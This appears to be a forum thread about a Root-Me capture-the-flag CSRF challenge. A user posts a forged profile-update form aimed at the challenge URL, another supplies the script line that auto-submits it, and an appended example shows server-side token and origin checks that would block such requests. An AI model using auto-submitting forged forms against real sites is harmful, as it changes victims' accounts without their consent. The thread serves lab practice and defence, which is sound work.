Friday 23 September 2022, 16:24  #1
Web - Client | CSRF 0 protection
iiiDaitoIII
  • 2 posts

Hi, can someone give me a hint about what I am doing wrong, please?
I am submitting this payload to the contact form:
<form id="csrf" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data">
<input type="text" name="username" value="r">
<label>Status:</label>
<input type="checkbox" name="status" checked>
<button type="submit">Submit</button>
</form>
But it doesn't seem to work. Can someone explain why?

Thursday 2 February 2023, 18:09  #2
FearZzZz
  • 2 posts

Hey mate,

You need to inject the script as well to auto submit your form, i.e.:

<script>document.getElementById("csrf").submit();</script>

Then just wait a few minutes and go to the "Private" tab.
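
For the defensive side of this thread, an added example (not from the posts above and not the challenge's own code): a server-side check that would reject a profile update auto-submitted from another site, because the browser attaches the session cookie but cannot supply the per-session token. The session store, the `csrf_token` field name, the request shape and the `example` origins are assumptions made for illustration; `username` and `status` are the form fields from the thread.

```javascript
const { randomBytes, timingSafeEqual } = require("node:crypto");

// Constructed in-memory session store: session id -> { user, csrfToken }.
const sessions = new Map();

function createSession(user) {
  const sid = randomBytes(16).toString("hex");
  // The token is rendered into the site's own profile form, never into a cookie.
  sessions.set(sid, { user, csrfToken: randomBytes(32).toString("hex") });
  return sid;
}

// Constant-time comparison so the check does not leak how many bytes matched.
function tokensMatch(a, b) {
  const x = Buffer.from(String(a));
  const y = Buffer.from(String(b));
  return x.length === y.length && timingSafeEqual(x, y);
}

// Decide whether a state-changing POST may proceed.
// req = { sessionId, headers: { origin }, body } (hypothetical request shape).
function checkProfileUpdate(req, trustedOrigin) {
  const session = sessions.get(req.sessionId);
  if (!session) return { ok: false, reason: "no session" };
  // Origin may be absent; when present it must be the site itself.
  const origin = req.headers.origin;
  if (origin !== undefined && origin !== trustedOrigin) {
    return { ok: false, reason: "cross-origin request" };
  }
  if (!tokensMatch(req.body.csrf_token ?? "", session.csrfToken)) {
    return { ok: false, reason: "missing or wrong CSRF token" };
  }
  return { ok: true, reason: "accepted" };
}

// Constructed sample requests: one from the site's own form, two forged.
function demo() {
  const site = "https://app.example";
  const sid = createSession("alice");
  const token = sessions.get(sid).csrfToken;
  const fields = { username: "r", status: "on" };
  return {
    legit: checkProfileUpdate({ sessionId: sid, headers: { origin: site },
      body: { ...fields, csrf_token: token } }, site),
    forged: checkProfileUpdate({ sessionId: sid,
      headers: { origin: "https://other.example" }, body: fields }, site),
    noOrigin: checkProfileUpdate({ sessionId: sid, headers: {}, body: fields }, site),
  };
}
```

The session id alone never authorises the change, which is the property a form with no CSRF protection lacks.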